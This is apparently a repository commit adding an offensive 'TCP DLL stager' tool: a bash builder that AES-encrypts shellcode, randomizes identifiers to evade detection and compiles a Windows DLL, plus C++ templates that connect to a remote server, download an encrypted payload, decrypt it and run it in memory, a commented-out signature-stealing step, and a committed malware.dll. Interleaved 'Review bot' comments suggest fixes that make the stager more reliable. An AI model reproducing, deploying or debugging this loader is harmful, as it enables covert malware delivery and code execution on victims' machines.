
Add files via upload

assume-breach před 2 roky
rodič
revize
f4843f8e02

+ 26 - 0
StageFright/StageFright/StageFright/TCPDLL/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')
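Review bot: The bare `except:` around the `open()` swallows every exception (including KeyboardInterrupt) and the following `sys.exit()` exits with status 0, so a missing or unreadable argument produces a "successful" run with only a usage line on stdout; since TCPDLL.sh captures this script's stdout into shell.txt without checking its status, that failure is silent downstream. Narrow it to `except (IndexError, OSError):`, print the usage to `sys.stderr`, and use `sys.exit(1)`. The IV is a fixed all-zero block and is never transmitted; that is only tolerable because `KEY` is regenerated per run, and the decryptor in template.cpp appears to rely on its provider's default IV and on re-hashing the 16 printed key bytes with SHA-256 to obtain the AES-256 key — a header comment should state both assumptions so the two sides are not changed independently, e.g. `# Consumer (template.cpp) derives the AES-256 key as SHA-256(KEY) and uses a zero IV; keep in sync.`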

+ 0 - 0
StageFright/StageFright/StageFright/TCPDLL/Resources/con.py


binární
StageFright/StageFright/StageFright/TCPDLL/Resources/malware.dll


+ 188 - 0
StageFright/StageFright/StageFright/TCPDLL/Resources/template.cpp

@@ -0,0 +1,188 @@
+#include <winsock2.h>
+#include <ws2tcpip.h>
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32")
+#include <psapi.h>
+
+// Define the shellcode function signature
+typedef void (*HUUTjodrPVG)();
+
+bool WXEjtHeXGRaH(const char* OQmbgsGuW, int yprPDCUUPq, const char* Random4, char*& GugJH, size_t& ENUQBQQ) {
+    WSADATA wsaData;
+    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
+        printf("Failed to initialize Winsock.\n");
+        return false;
+    }
+
+    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
+    if (clientSocket == INVALID_SOCKET) {
+        perror("Error creating socket");
+        WSACleanup();
+        return false;
+    }
+
+    sockaddr_in serverAddress{};
+    serverAddress.sin_family = AF_INET;
+    serverAddress.sin_port = htons(yprPDCUUPq);
+    serverAddress.sin_addr.s_addr = inet_addr(OQmbgsGuW);
+
+    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
+        perror("Invalid address/Address not supported");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
+        perror("Connection failed");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    // Send the length of the file path first
+    size_t Random4Len = strlen(Random4);
+    printf("Sending file path length: %zu\n", Random4Len);
+    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
+
+    // Send the file path to the server
+    printf("Sending file path: %s\n", Random4);
+    send(clientSocket, Random4, Random4Len, 0);
+
+    int fileSize;
+    int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
+    if (bytesRead != sizeof(fileSize)) {
+        printf("Error receiving file size: %d\n", WSAGetLastError());
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    fileSize = ntohl(fileSize); // Convert from network byte order to host byte order
+
+    printf("Received file size: %d\n", fileSize);
+    // Receive and save the binary data in a dynamically allocated buffer
+    GugJH = new char[fileSize];
+    if (GugJH == nullptr) {
+        printf("Error allocating memory for binary data.\n");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    size_t totalSize = 0;
+    while (totalSize < fileSize) {
+        bytesRead = recv(clientSocket, GugJH + totalSize, fileSize - totalSize, 0);
+        if (bytesRead <= 0) {
+            printf("Error receiving binary data: %d\n", WSAGetLastError());
+            delete[] GugJH;
+            closesocket(clientSocket);
+            WSACleanup();
+            return false;
+        }
+        totalSize += bytesRead;
+    }
+
+    // Close the socket
+    closesocket(clientSocket);
+
+    ENUQBQQ = totalSize;
+    printf("Received data size: %zu\n", ENUQBQQ);
+
+    return true;
+}
+
+int kaRyEcluPiEW(char* gwtamZsHddxtV, unsigned int gwtamZsHddxtV_len, char* iNjzxZyJyK, size_t iNjzxZyJyKlen) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)iNjzxZyJyK, (DWORD)iNjzxZyJyKlen, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, gwtamZsHddxtV, &gwtamZsHddxtV_len)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char iNjzxZyJyK[] =  { 0x59, 0xfa, 0xe2, 0x44, 0x6c, 0xf1, 0x9e, 0xf6, 0xdf, 0xd8, 0x4e, 0x16, 0xcd, 0xf5, 0x8a, 0xf6 };;
+
+extern "C" void CALLBACK Go(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+    const char* OQmbgsGuW = "192.168.1.12";        // Replace with the actual server IP
+    int yprPDCUUPq = 8080;                     // Replace with the actual server port
+    const char* Random4 = "invoice.txt";   // Replace with the actual file path on the server
+
+    char* GugJH;
+    size_t ENUQBQQ;
+
+    if (WXEjtHeXGRaH(OQmbgsGuW, yprPDCUUPq, Random4, GugJH, ENUQBQQ)) {
+        printf("Binary data received successfully.\n");
+
+        // Print received data size for debugging
+        printf("Received data size: %zu\n", ENUQBQQ);
+
+        kaRyEcluPiEW((char*)GugJH, ENUQBQQ, iNjzxZyJyK, sizeof(iNjzxZyJyK));
+
+        // Allocate executable memory with READ, WRITE permissions
+        LPVOID executableMemory = VirtualAlloc(NULL, ENUQBQQ, MEM_COMMIT, PAGE_READWRITE);
+        if (executableMemory == NULL) {
+            DWORD error = GetLastError();
+            printf("Error allocating executable memory: %d\n", error);
+            delete[] GugJH;
+            return;
+        }
+
+        // Copy binary data to the executable memory
+        memcpy(executableMemory, GugJH, ENUQBQQ);
+
+        // Change the protection to PAGE_EXECUTE_READ
+        DWORD oldProtect;
+        if (!VirtualProtect(executableMemory, ENUQBQQ, PAGE_EXECUTE_READ, &oldProtect)) {
+            DWORD error = GetLastError();
+            printf("Error changing memory protection: %d\n", error);
+            VirtualFree(executableMemory, 0, MEM_RELEASE);
+            delete[] GugJH;
+            return;
+        }
+
+        // Create a function pointer to the shellcode
+        HUUTjodrPVG pCyhiFoGQ = reinterpret_cast<HUUTjodrPVG>(executableMemory);
+
+        // Call the shellcode function
+        printf("Executing shellcode...\n");
+        pCyhiFoGQ();
+
+        // No freeing of allocated memory in this POC
+
+        printf("Shellcode executed successfully.\n");
+
+        // Free allocated memory
+        delete[] GugJH;
+    } else {
+        printf("Failed to receive binary data.\n");
+        return;
+    }
+}
+
+
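Review bot: This file is the substituted output of TCPDLL.sh (the script copies template.cpp to Resources/ and sed-edits it), so it carries one run's AES key bytes, a concrete server IP, the stage filename, and leftover `Random4` placeholders that the script never replaced; together with the compiled malware.dll in the same directory it is a build artifact that should be git-ignored rather than committed, and the `rm` for the sibling con.py is still commented out in the script. Independently, the decrypt helper returns -1 on each failed CryptoAPI call without releasing the hProv/hHash acquired before it, and its success path releases in the wrong order — the provider should go last: `CryptDestroyKey(hKey); CryptDestroyHash(hHash); CryptReleaseContext(hProv, 0);`.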

+ 172 - 0
StageFright/StageFright/StageFright/TCPDLL/TCPDLL.sh

@@ -0,0 +1,172 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+TCP DLL STAGER                        
+
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"What's The IP For Your TCP Server?"${clear}
+echo ""
+read HOSTIP
+echo ""
+echo -e ${green}"What Is The Port Your TCP Server Is Using?"${clear}
+echo ""
+read PORTY
+echo ""
+echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
+echo ""
+read SHELLCODEFILE
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.dll"${clear}
+echo ""
+read MALWARE
+echo ""
+cp StageFright/TCPDLL/template.cpp StageFright/TCPDLL/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 StageFright/TCPDLL/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" StageFright/TCPDLL/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+cp StageFright/TCPDLL/conv.py StageFright/TCPDLL/Resources/con.py
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/TCPDLL/Resources/con.py
+sed -i "s/{/[/g" -i StageFright/TCPDLL/Resources/con.py
+sed -i "s/}/]/g" -i StageFright/TCPDLL/Resources/con.py
+sed -i "s/;//g" -i StageFright/TCPDLL/Resources/con.py
+python3 StageFright/TCPDLL/Resources/con.py
+#rm StageFright/TCPDLL/Resources/con.py
+mv payload.bin $SHELLCODEFILE
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomE=$(cat shell.txt)
+sed -i "s/RandomE/$RandomE/g" StageFright/TCPDLL/Resources/template.cpp
+
+
+#Replace IP, PORT and SHELLCODEFILE
+sed -i "s/HOSTIP/$HOSTIP/g" StageFright/TCPDLL/Resources/template.cpp
+sed -i "s/PORTY/$PORTY/g" StageFright/TCPDLL/Resources/template.cpp
+sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/TCPDLL/Resources/template.cpp
+#Replacing Values
+
+# Get Payload From URL Function
+
+#FindShare
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" StageFright/TCPDLL/Resources/template.cpp
+
+#pPayloadBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" StageFright/TCPDLL/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" StageFright/TCPDLL/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random4=$(cat shell.txt)
+
+sed -i "s/Random3/$Random3/g" StageFright/TCPDLL/Resources/template.cpp
+#bSTATE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" StageFright/TCPDLL/Resources/template.cpp
+
+#sSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" StageFright/TCPDLL/Resources/template.cpp
+
+#hInternet
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" StageFright/TCPDLL/Resources/template.cpp
+
+#dwBytesRead
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" StageFright/TCPDLL/Resources/template.cpp
+
+#pBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" StageFright/TCPDLL/Resources/template.cpp
+
+#PAYLOAD
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomA=$(cat shell.txt)
+sed -i "s/RandomA/$RandomA/g" StageFright/TCPDLL/Resources/template.cpp
+
+#Sleep Function
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomJ=$(cat shell.txt)
+sed -i "s/RandomJ/$RandomJ/g" StageFright/TCPDLL/Resources/template.cpp
+
+#AES KEY NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+RandomK=$(cat shell.txt)
+sed -i "s/RandomK/$RandomK/g" StageFright/TCPDLL/Resources/template.cpp
+
+# Main Function
+
+#Bytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomB=$(cat shell.txt)
+sed -i "s/RandomB/$RandomB/g" StageFright/TCPDLL/Resources/template.cpp
+
+#Size
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomC=$(cat shell.txt)
+sed -i "s/RandomC/$RandomC/g" StageFright/TCPDLL/Resources/template.cpp
+
+#Compile
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -shared -o $MALWARE StageFright/TCPDLL/Resources/template.cpp -lws2_32 -lntdll -static-libgcc -static-libstdc++ -Wl,--subsystem,windows -O2 -Wno-narrowing -fpermissive >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+sleep 2
+#echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+#echo ""
+#sleep 2
+#python3 StageFright/StageFright/ResourcesSigThief/sigthief.py -i StageFright/StageFright/TCPDLL/Resources/OfficeSetup.exe #-t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+#mv signed$MALWARE $MALWARE
+#echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+#echo ""
+
+
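Review bot: The `Random4` placeholder is never substituted — the block that generates `$Random4` ends with a second `sed -i "s/Random3/$Random3/g"` instead of `sed -i "s/Random4/$Random4/g"`, so the compiled source keeps the literal `Random4` identifier (visible in the committed Resources/template.cpp). The `fold -w ${1:-11}` pattern reads the script's first positional argument as the identifier width, which looks unintended; use the literal width. `rm shell*` near the end globs the current directory and will delete a user's own `shellcode.bin` if it was placed there, and the compile step discards g++ output and never checks its exit status, so a failed build still prints "Malware Compiled". The `read` inputs are used unquoted (`$Shellcode`, `$SHELLCODEFILE`, `$MALWARE`), so a path containing spaces breaks the python and mv invocations; quote them and consider `set -euo pipefail` at the top.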

+ 4 - 0
StageFright/StageFright/StageFright/TCPDLL/conv.py

@@ -0,0 +1,4 @@
+buf=PAYVAL 
+payload = bytes(bytearray(buf))
+with open('payload.bin', 'wb') as f:
+    f.write(payload)
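Review bot: Nothing in this file records that `PAYVAL` is a placeholder rewritten by TCPDLL.sh (perl substitutes the byte list, then sed turns the C braces into a Python list) after the file is copied to Resources/con.py, so as committed it is a syntax error waiting to be run; add a header comment such as `# Template: PAYVAL is replaced by TCPDLL.sh with the encrypted byte list; do not run directly.` The `bytes(bytearray(buf))` round-trip is redundant — `bytes(buf)` is equivalent for a list of ints.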

+ 188 - 0
StageFright/StageFright/StageFright/TCPDLL/template.cpp

@@ -0,0 +1,188 @@
+#include <winsock2.h>
+#include <ws2tcpip.h>
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32")
+#include <psapi.h>
+
+// Define the shellcode function signature
+typedef void (*RandomA)();
+
+bool Random1(const char* Random2, int Random3, const char* Random4, char*& Random5, size_t& Random6) {
+    WSADATA wsaData;
+    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
+        printf("Failed to initialize Winsock.\n");
+        return false;
+    }
+
+    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
+    if (clientSocket == INVALID_SOCKET) {
+        perror("Error creating socket");
+        WSACleanup();
+        return false;
+    }
+
+    sockaddr_in serverAddress{};
+    serverAddress.sin_family = AF_INET;
+    serverAddress.sin_port = htons(Random3);
+    serverAddress.sin_addr.s_addr = inet_addr(Random2);
+
+    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
+        perror("Invalid address/Address not supported");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
+        perror("Connection failed");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    // Send the length of the file path first
+    size_t Random4Len = strlen(Random4);
+    printf("Sending file path length: %zu\n", Random4Len);
+    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
+
+    // Send the file path to the server
+    printf("Sending file path: %s\n", Random4);
+    send(clientSocket, Random4, Random4Len, 0);
+
+    int fileSize;
+    int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
+    if (bytesRead != sizeof(fileSize)) {
+        printf("Error receiving file size: %d\n", WSAGetLastError());
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    fileSize = ntohl(fileSize); // Convert from network byte order to host byte order
+
+    printf("Received file size: %d\n", fileSize);
+    // Receive and save the binary data in a dynamically allocated buffer
+    Random5 = new char[fileSize];
+    if (Random5 == nullptr) {
+        printf("Error allocating memory for binary data.\n");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    size_t totalSize = 0;
+    while (totalSize < fileSize) {
+        bytesRead = recv(clientSocket, Random5 + totalSize, fileSize - totalSize, 0);
+        if (bytesRead <= 0) {
+            printf("Error receiving binary data: %d\n", WSAGetLastError());
+            delete[] Random5;
+            closesocket(clientSocket);
+            WSACleanup();
+            return false;
+        }
+        totalSize += bytesRead;
+    }
+
+    // Close the socket
+    closesocket(clientSocket);
+
+    Random6 = totalSize;
+    printf("Received data size: %zu\n", Random6);
+
+    return true;
+}
+
+int Random7(char* Random8, unsigned int Random8_len, char* Random9, size_t Random9len) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)Random9, (DWORD)Random9len, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random8, &Random8_len)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char Random9[] = KEYVALUE;
+
+extern "C" void CALLBACK Go(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+    const char* Random2 = "HOSTIP";        // Replace with the actual server IP
+    int Random3 = PORTY;                     // Replace with the actual server port
+    const char* Random4 = "SHELLCODEFILE";   // Replace with the actual file path on the server
+
+    char* Random5;
+    size_t Random6;
+
+    if (Random1(Random2, Random3, Random4, Random5, Random6)) {
+        printf("Binary data received successfully.\n");
+
+        // Print received data size for debugging
+        printf("Received data size: %zu\n", Random6);
+
+        Random7((char*)Random5, Random6, Random9, sizeof(Random9));
+
+        // Allocate executable memory with READ, WRITE permissions
+        LPVOID executableMemory = VirtualAlloc(NULL, Random6, MEM_COMMIT, PAGE_READWRITE);
+        if (executableMemory == NULL) {
+            DWORD error = GetLastError();
+            printf("Error allocating executable memory: %d\n", error);
+            delete[] Random5;
+            return;
+        }
+
+        // Copy binary data to the executable memory
+        memcpy(executableMemory, Random5, Random6);
+
+        // Change the protection to PAGE_EXECUTE_READ
+        DWORD oldProtect;
+        if (!VirtualProtect(executableMemory, Random6, PAGE_EXECUTE_READ, &oldProtect)) {
+            DWORD error = GetLastError();
+            printf("Error changing memory protection: %d\n", error);
+            VirtualFree(executableMemory, 0, MEM_RELEASE);
+            delete[] Random5;
+            return;
+        }
+
+        // Create a function pointer to the shellcode
+        RandomA RandomB = reinterpret_cast<RandomA>(executableMemory);
+
+        // Call the shellcode function
+        printf("Executing shellcode...\n");
+        RandomB();
+
+        // No freeing of allocated memory in this POC
+
+        printf("Shellcode executed successfully.\n");
+
+        // Free allocated memory
+        delete[] Random5;
+    } else {
+        printf("Failed to receive binary data.\n");
+        return;
+    }
+}
+
+
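Review bot: The return value of the decrypt call in Go() is discarded, so if any CryptoAPI step fails — including CryptDecrypt rejecting a buffer whose length is not a multiple of the AES block size — the still-encrypted bytes are copied into executable memory and jumped to. A related gap is that the size received over the socket is an `int` used unchecked for `new char[]` and the read loop: a negative value becomes a huge allocation and, with the default throwing `new`, raises std::bad_alloc out of the exported callback (the `nullptr` test after it never fires), while zero silently falls through to a failing VirtualAlloc. CryptDecrypt is also called with Final=FALSE, so the PKCS#7 padding that aesencrypt.py appends stays in the buffer after the shellcode; either pass TRUE and use the updated length or document that trailing padding is expected. The receive helper never calls WSACleanup on its success path. Proposed changes:
```cpp
    // … unchanged: receive size header …
    fileSize = ntohl(fileSize);
    if (fileSize <= 0) {
        printf("Invalid file size: %d\n", fileSize);
        closesocket(clientSocket);
        WSACleanup();
        return false;
    }
    // … unchanged: allocation and receive loop …

    // in Go(), replacing the bare Random7(...) call:
    if (Random7((char*)Random5, Random6, Random9, sizeof(Random9)) != 0) {
        printf("Payload decryption failed.\n");
        delete[] Random5;
        return;
    }
    // … unchanged: VirtualAlloc / memcpy / VirtualProtect / call …
```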
